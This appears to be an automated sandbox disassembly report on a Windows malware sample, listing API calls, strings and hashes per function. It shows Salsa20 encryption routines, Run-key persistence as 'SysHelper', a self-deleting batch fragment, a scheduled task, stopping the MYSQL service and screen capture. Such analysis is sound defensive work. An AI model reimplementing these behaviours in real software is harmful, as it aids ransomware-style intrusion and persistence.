                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 1351282208-711371036
                                                                                                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                APIs
                                                                                                Strings
                                                                                                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wassert
                                                                                                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                • API String ID: 3993402318-1975116136
                                                                                                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                • GetLastError.KERNEL32 ref: 00412509
                                                                                                • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                • CloseHandle.KERNEL32 ref: 00412539
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                • GetLastError.KERNEL32 ref: 0041255B
                                                                                                • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                • API String ID: 2372642624-488272950
                                                                                                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32 ref: 00411915
                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                • _memset.LIBCMT ref: 004119B8
                                                                                                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                • String ID: failed with error
                                                                                                • API String ID: 4182478520-946485432
                                                                                                • Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                • Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                APIs
                                                                                                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                • DeleteDC.GDI32(?), ref: 00482450
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                • API String ID: 151064509-1805842116
                                                                                                • Opcode ID: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                • Opcode Fuzzy Hash: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                • API String ID: 909875538-2733969777
                                                                                                • Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                • Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 1503006713-0
                                                                                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                                                                • String ID:
                                                                                                • API String ID: 2762079118-0
                                                                                                • Opcode ID: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
                                                                                                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                • Opcode Fuzzy Hash: 0727ae4cc99d48966fa21793c9fc57279ad8f68c0750dd608dbf0930cc1fe26a
                                                                                                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                • String ID: \shell32.dll
                                                                                                • API String ID: 679253221-3783449302
                                                                                                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                • String ID: Service-0x$_OPENSSL_isservice
                                                                                                • API String ID: 2112994598-1672312481
                                                                                                • Opcode ID: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                                                                                                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                • Opcode Fuzzy Hash: 3807c14e2e06666c3841fd577d8dc4c169a4d8fe6725ffaf2f8e04ccca0ab35a
                                                                                                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454B05
                                                                                                • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                • vswprintf.LIBCMT ref: 00454B5D
                                                                                                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                • API String ID: 277090408-1348657634
                                                                                                • Opcode ID: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                                                                                                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                • Opcode Fuzzy Hash: ce6eb8d3f5f16185de033b2eb02e1ed4c4d2bc7c389f561c58e1c798f68c238c
                                                                                                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                • _memset.LIBCMT ref: 004123B6
                                                                                                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                Strings
                                                                                                • SysHelper, xrefs: 004123D6
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                • API String ID: 122392481-4165002228
                                                                                                • Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                • Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                • Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                • _memset.LIBCMT ref: 0040DC38
                                                                                                • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                • String ID: --Task$Comment$Time Trigger Task
                                                                                                • API String ID: 330603062-1376107329
                                                                                                • Opcode ID: 3d21c91553e7a2c47b75248eed8174f0ef509435366e908d9b787f559111c5f4
                                                                                                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                • Opcode Fuzzy Hash: 3d21c91553e7a2c47b75248eed8174f0ef509435366e908d9b787f559111c5f4
                                                                                                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                • String ID: MYSQL
                                                                                                • API String ID: 2359367111-1651825290
                                                                                                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                Strings
                                                                                                Memory Dump Source
